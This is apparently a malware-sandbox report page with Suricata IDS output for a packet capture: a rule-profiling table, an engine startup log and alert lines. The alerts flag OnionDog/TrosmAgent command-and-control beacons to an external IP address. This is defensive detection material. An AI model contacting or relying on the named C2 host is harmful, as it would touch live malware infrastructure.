  13       2805260      1        4        17317694     0.68   322      0        4878512     53781.66    0.00        53781.66   
  14       2017261      1        3        23813694     0.93   322      0        3897478     73955.57    0.00        73955.57   
  15       2018983      1        7        22899098     0.90   322      0        3395078     71115.21    0.00        71115.21   
  16       2821641      1        2        23765042     0.93   322      0        3244766     73804.48    0.00        73804.48   
  17       2816940      1        2        33452964     1.31   322      0        2413994     103891.19   0.00        103891.19  
  18       2816931      1        3        19657594     0.77   322      0        2114308     61048.43    0.00        61048.43   
  19       2815156      1        2        9254428      0.36   161      0        1091490     57480.92    0.00        57480.92   
  20       2815181      1        3        10989518     0.43   161      0        848860      68257.88    0.00        68257.88   
  21       2813027      1        3        6840314      0.27   161      0        697154      42486.42    0.00        42486.42   
  22       2816614      1        3        19968612     0.78   161      161      638376      124028.65   124028.65   0.00       
  23       2018358      1        7        44799510     1.76   322      0        563200      139128.91   0.00        139128.91  
  24       2016537      1        2        9309596      0.36   322      0        558070      28911.79    0.00        28911.79   
  25       2016858      1        10       24552404     0.96   322      0        542316      76249.70    0.00        76249.70   
  26       2812433      1        2        23500258     0.92   322      0        536860      72982.17    0.00        72982.17   
  27       2017948      1        2        19083932     0.75   322      0        535216      59266.87    0.00        59266.87   
  28       2819785      1        2        16215680     0.64   161      0        528570      100718.51   0.00        100718.51  
  29       2811474      1        2        6817814      0.27   161      0        508954      42346.67    0.00        42346.67   
  30       2807970      1        8        22596842     0.89   322      0        506536      70176.53    0.00        70176.53   
  31       2019344      1        5        23499676     0.92   322      0        502648      72980.36    0.00        72980.36   
  32       2821615      1        2        17720094     0.69   322      0        502482      55031.35    0.00        55031.35   
  33       2810991      1        4        15146656     0.59   161      0        501736      94078.61    0.00        94078.61   
  34       2014967      1        3        16813832     0.66   322      0        501450      52216.87    0.00        52216.87   
  35       2809363      1        3        22409906     0.88   322      0        495882      69595.98    0.00        69595.98   
  36       2815325      1        3        22496002     0.88   322      0        495026      69863.36    0.00        69863.36   
  37       2821643      1        2        21340472     0.84   322      0        493980      66274.76    0.00        66274.76   
  38       2022504      1        6        6973360      0.27   161      0        491996      43312.80    0.00        43312.80   
  39       2816055      1        2        12456770     0.49   161      0        490528      77371.24    0.00        77371.24   
  40       2019094      1        5        21880672     0.86   322      0        488812      67952.40    0.00        67952.40   
  41       2828122      1        2        21299636     0.83   322      0        486624      66147.94    0.00        66147.94   
  42       2012612      1        16       32752986     1.28   322      161      483118      101717.35   158642.32   44792.37   
  43       2816525      1        10       20747534     0.81   322      0        479094      64433.34    0.00        64433.34   
  44       2014090      1        7        13285426     0.52   322      0        478408      41259.09    0.00        41259.09   
  45       2021413      1        2        19165624     0.75   322      0        477962      59520.57    0.00        59520.57   
  46       2018496      1        9        16615972     0.65   322      0        477836      51602.40    0.00        51602.40   
  47       2816922      1        5        18423450     0.72   322      0        473212      57215.68    0.00        57215.68   
  48       2008377      1        5        8822882      0.35   161      0        471386      54800.51    0.00        54800.51   
  49       2819823      1        5        8687718      0.34   161      0        469844      53960.98    0.00        53960.98   
  50       2816930      1        4        20214518     0.79   322      0        468644      62778.01    0.00        62778.01   
  51       2018055      1        3        16315236     0.64   322      0        467964      50668.43    0.00        50668.43   
  52       2821471      1        2        21148850     0.83   322      0        467438      65679.66    0.00        65679.66   
  53       2024771      1        1        15015008     0.59   322      0        459816      46630.46    0.00        46630.46   
  54       2816929      1        4        23692428     0.93   322      0        432936      73578.97    0.00        73578.97   
  55       2828008      1        2        23405726     0.92   322      0        428400      72688.59    0.00        72688.59   
  56       2021399      1        3        8902620      0.35   161      0        427702      55295.78    0.00        55295.78   
  57       2828877      1        1        2090334      0.08   322      0        427358      6491.72     0.00        6491.72    
  58       2821450      1        3        14691020     0.58   161      0        426784      91248.57    0.00        91248.57   
  59       2023916      1        2        10956940     0.43   161      0        401378      68055.53    0.00        68055.53   
  60       2819673      1        4        20675090     0.81   322      0        371794      64208.35    0.00        64208.35   
  61       2806921      1        3        6593256      0.26   161      0        366498      40951.90    0.00        40951.90   
  62       2017456      1        3        6367078      0.25   161      0        361016      39547.07    0.00        39547.07   
  63       2816726      1        2        6513930      0.26   161      0        349568      40459.19    0.00        40459.19   
  64       2015877      1        6        17841206     0.70   322      0        341922      55407.47    0.00        55407.47   
  65       2821561      1        2        11127982     0.44   161      0        341054      69117.90    0.00        69117.90   
  66       2815440      1        3        24219542     0.95   322      0        333032      75215.97    0.00        75215.97   
  67       2821644      1        4        21095296     0.83   322      0        324684      65513.34    0.00        65513.34   
  68       2828317      1        1        6881328      0.27   161      0        321804      42741.17    0.00        42741.17   
  69       2020181      1        8        27955032     1.10   322      0        318752      86816.87    0.00        86816.87   
  70       2823858      1        3        20614444     0.81   322      0        313960      64020.01    0.00        64020.01   
  71       2018958      1        18       26019712     1.02   322      0        287816      80806.56    0.00        80806.56   
  72       2827279      1        5        22955018     0.90   322      0        281480      71288.88    0.00        71288.88   
  73       2816327      1        4        20847310     0.82   322      0        259520      64743.20    0.00        64743.20   
  74       2816909      1        2        31662574     1.24   322      0        257500      98330.98    0.00        98330.98   
  75       2018981      1        4        16557692     0.65   322      0        256306      51421.40    0.00        51421.40   
  76       2016809      1        5        12854226     0.50   322      0        248604      39919.96    0.00        39919.96   
  77       2014380      1        4        11406550     0.45   322      0        246636      35424.07    0.00        35424.07   
  78       2003657      1        18       13075340     0.51   322      0        243200      40606.65    0.00        40606.65   
  79       2025064      1        5        22295276     0.87   322      0        236094      69239.99    0.00        69239.99   
  80       2815817      1        5        17811530     0.70   322      0        235832      55315.31    0.00        55315.31   
  81       2816895      1        2        13637000     0.53   161      0        227208      84701.86    0.00        84701.86   
  82       2804626      1        9        13099814     0.51   322      0        219066      40682.65    0.00        40682.65   
  83       2801224      1        6        6395560      0.25   161      0        216878      39723.98    0.00        39723.98   
  84       2017076      1        9        6477836      0.25   161      0        215960      40235.01    0.00        40235.01   
  85       2825196      1        1        6475446      0.25   161      0        215352      40220.16    0.00        40220.16   
  86       2806959      1        2        6538392      0.26   161      0        214974      40611.13    0.00        40611.13   
  87       2822633      1        3        6510014      0.26   161      0        212518      40434.87    0.00        40434.87   
  88       2811905      1        3        10239350     0.40   161      0        207644      63598.45    0.00        63598.45   
  89       2809511      1        4        16344194     0.64   322      0        204666      50758.37    0.00        50758.37   
  90       2826256      1        2        13228488     0.52   322      0        203234      41082.26    0.00        41082.26   
  91       2821642      1        2        19305048     0.76   322      0        202710      59953.57    0.00        59953.57   
  92       2016706      1        20       12824554     0.50   322      0        197192      39827.81    0.00        39827.81   
  93       2015808      1        6        12931838     0.51   322      0        191814      40160.99    0.00        40160.99   
  94       2823488      1        2        8467302      0.33   161      0        191540      52591.94    0.00        52591.94   
  95       2022901      1        2        20194780     0.79   322      0        190524      62716.71    0.00        62716.71   
  96       2815568      1        2        18524418     0.73   322      0        189614      57529.25    0.00        57529.25   
  97       2807793      1        4        16210060     0.64   322      0        187410      50341.80    0.00        50341.80   
  98       2829644      1        1        9036052      0.35   161      0        187028      56124.55    0.00        56124.55   
  99       2821569      1        7        16262292     0.64   322      0        185306      50504.01    0.00        50504.01   
  100      2020708      1        2        11849996     0.46   161      0        185138      73602.46    0.00        73602.46   
  101      2024573      1        2        8136224      0.32   161      0        181958      50535.55    0.00        50535.55   
  102      2820696      1        2        8175138      0.32   161      0        181394      50777.25    0.00        50777.25   
  103      2021631      1        2        10091332     0.40   161      0        180338      62679.08    0.00        62679.08   
  104      2017613      1        9        17440656     0.68   322      0        178608      54163.53    0.00        54163.53   
  105      2806132      1        3        8686626      0.34   161      0        176690      53954.20    0.00        53954.20   
  106      2020964      1        2        8438040      0.33   161      0        174512      52410.19    0.00        52410.19   
  107      2021995      1        3        11958768     0.47   161      0        169572      74278.06    0.00        74278.06   
  108      2810982      1        3        6779016      0.27   161      0        163500      42105.69    0.00        42105.69   
  109      2809547      1        5        12405270     0.49   322      0        163128      38525.68    0.00        38525.68   
  110      2809682      1        5        12427046     0.49   322      0        162438      38593.31    0.00        38593.31   
  111      2025162      1        2        8535604      0.33   161      0        161868      53016.17    0.00        53016.17   
  112      2018242      1        5        15994114     0.63   322      0        161864      49671.16    0.00        49671.16   
  113      2816165      1        5        19720188     0.77   322      0        161574      61242.82    0.00        61242.82   
  114      2827580      1        7        6744480      0.26   161      0        160954      41891.18    0.00        41891.18   
  115      2017552      1        6        21031384     0.82   644      0        160074      32657.43    0.00        32657.43   
  116      2823166      1        3        8780038      0.34   161      0        159020      54534.40    0.00        54534.40   
  117      2830035      1        2        6646896      0.26   161      0        158100      41285.07    0.00        41285.07   
  118      2829335      1        2        6289338      0.25   161      0        157838      39064.21    0.00        39064.21   
  119      2012627      1        3        6507692      0.26   161      0        156868      40420.45    0.00        40420.45   
  120      2815180      1        3        10260884     0.40   161      0        156404      63732.20    0.00        63732.20   
  121      2820889      1        2        6398418      0.25   161      0        154144      39741.73    0.00        39741.73   
  122      2017045      1        3        752310       0.03   15       0        153936      50154.00    0.00        50154.00   
  123      2011894      1        19       20091042     0.79   322      0        150088      62394.54    0.00        62394.54   
  124      2819993      1        2        8166992      0.32   161      0        149204      50726.66    0.00        50726.66   
  125      2804765      1        10       6

This file has been truncated. Go here to download in full.


suricata-report-2019-08-13-T-12-11-14-08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap.txt - (17876 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/cf556455534924bd14168c1c670054f956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap -vvv -k none
elapsedtime:27.824699
stderr:
stdout:
13/8/2019 -- 12:10:46 - <Info> - Configuration node 'rule-files' redefined.
13/8/2019 -- 12:10:46 - <Notice> - This is Suricata version 4.0.0 RELEASE
13/8/2019 -- 12:10:46 - <Info> - CPUs/cores online: 1
13/8/2019 -- 12:10:46 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 34270 and 'request-body-inspect-window' set to 16239 after randomization.
13/8/2019 -- 12:10:46 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32945 and 'response-body-inspect-window' set to 16082 after randomization.
13/8/2019 -- 12:10:46 - <Config> - DNS request flood protection level: 500
13/8/2019 -- 12:10:46 - <Config> - DNS per flow memcap (state-memcap): 524288
13/8/2019 -- 12:10:46 - <Config> - DNS global memcap: 16777216
13/8/2019 -- 12:10:46 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
13/8/2019 -- 12:10:46 - <Config> - preallocated 1000 hosts of size 136
13/8/2019 -- 12:10:46 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
13/8/2019 -- 12:10:46 - <Config> - using magic-file /usr/share/file/magic
13/8/2019 -- 12:10:46 - <Config> - Core dump size is unlimited.
13/8/2019 -- 12:10:46 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
13/8/2019 -- 12:10:46 - <Config> - preallocated 1000 defrag trackers of size 168
13/8/2019 -- 12:10:46 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
13/8/2019 -- 12:10:46 - <Config> - stream "prealloc-sessions": 2048 (per thread)
13/8/2019 -- 12:10:46 - <Config> - stream "memcap": 33554432
13/8/2019 -- 12:10:46 - <Config> - stream "midstream" session pickups: disabled
13/8/2019 -- 12:10:46 - <Config> - stream "async-oneside": disabled
13/8/2019 -- 12:10:46 - <Config> - stream "checksum-validation": disabled
13/8/2019 -- 12:10:46 - <Config> - stream."inline": disabled
13/8/2019 -- 12:10:46 - <Config> - stream "bypass": disabled
13/8/2019 -- 12:10:46 - <Config> - stream "max-synack-queued": 5
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "memcap": 134217728
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "depth": 0
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "toserver-chunk-size": 2446
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "toclient-chunk-size": 2532
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly.raw: enabled
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "segment-prealloc": 2048
13/8/2019 -- 12:10:46 - <Config> - Delayed detect disabled
13/8/2019 -- 12:10:46 - <Config> - pattern matchers: MPM: ac, SPM: bm
13/8/2019 -- 12:10:46 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
13/8/2019 -- 12:10:46 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
13/8/2019 -- 12:10:46 - <Config> - prefilter engines: MPM
13/8/2019 -- 12:10:46 - <Config> - IP reputation disabled
13/8/2019 -- 12:10:46 - <Perf> - Registered 148 keyword profiling counters.
13/8/2019 -- 12:10:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
13/8/2019 -- 12:10:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
13/8/2019 -- 12:10:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
13/8/2019 -- 12:10:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
13/8/2019 -- 12:10:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
13/8/2019 -- 12:10:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
13/8/2019 -- 12:10:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
13/8/2019 -- 12:10:52 - <Config> - No rules loaded from ET-icmp.rules.
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
13/8/2019 -- 12:10:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
13/8/2019 -- 12:10:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
13/8/2019 -- 12:10:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
13/8/2019 -- 12:10:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
13/8/2019 -- 12:10:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
13/8/2019 -- 12:11:00 - <Config> - No rules loaded from local.rules.
13/8/2019 -- 12:11:00 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
13/8/2019 -- 12:11:00 - <Info> - Threshold config parsed: 0 rule(s) found
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tcp-packet
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tcp-stream
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for udp-packet
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for other-ip
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_uri
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_request_line
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_client_body
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_response_line
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_header
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_header
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_header_names
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_header_names
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_accept
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_accept_enc
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_accept_lang
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_referer
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_connection
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_content_len
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_content_len
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_content_type
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_content_type
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_protocol
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_protocol
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_start
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_start
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_raw_header
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_raw_header
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_method
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_cookie
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_cookie
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_raw_uri
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_user_agent
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_host
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_raw_host
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_stat_msg
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_stat_code
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for dns_query
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tls_sni
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tls_cert_issuer
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tls_cert_subject
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tls_cert_serial
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for dce_stub_data
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for dce_stub_data
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for ssh_protocol
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for ssh_protocol
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for ssh_software
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for ssh_software
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for file_data
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for file_data
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_request_line
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_response_line
13/8/2019 -- 12:11:01 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
13/8/2019 -- 12:11:01 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
13/8/2019 -- 12:11:01 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
13/8/2019 -- 12:11:01 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
13/8/2019 -- 12:11:01 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
13/8/2019 -- 12:11:01 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
13/8/2019 -- 12:11:01 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
13/8/2019 -- 12:11:01 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
13/8/2019 -- 12:11:09 - <Perf> - Unique rule groups: 104
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toserver TCP packet": 35
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toclient TCP packet": 17
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toserver TCP stream": 33
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toclient TCP stream": 19
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toserver UDP packet": 27
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toclient UDP packet": 17
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "other IP packet": 3
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_uri": 14
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_request_line": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_client_body": 6
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_response_line": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_header": 10
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_header": 6
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_header_names": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_accept": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_referer": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_content_len": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_content_type": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_content_type": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_protocol": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_start": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_method": 5
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_cookie": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_cookie": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_host": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver dns_query": 4
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver tls_sni": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver file_data": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient file_data": 7
13/8/2019 -- 12:11:12 - <Perf> - Registered 39590 rule profiling counters.
13/8/2019 -- 12:11:12 - <Info> - fast output device (regular) initialized: alert
13/8/2019 -- 12:11:12 - <Info> - eve-log output device (regular) initialized: eve.json
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'alert'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'http'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'dns'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'tls'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'files'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'ssh'
13/8/2019 -- 12:11:12 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
13/8/2019 -- 12:11:12 - <Info> - stats output device (regular) initialized: stats.log
13/8/2019 -- 12:11:12 - <Config> - AutoFP mode using "Hash" flow load balancer
13/8/2019 -- 12:11:12 - <Info> - reading pcap file /var/pcap/08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af46

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-alert-2019-08-13-T-12-11-14-08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap.txt - (63753 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
15.415054  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1049 -> 93.188.160.77:80
15.626881  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1050 -> 93.188.160.77:80
15.838390  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 93.188.160.77:80
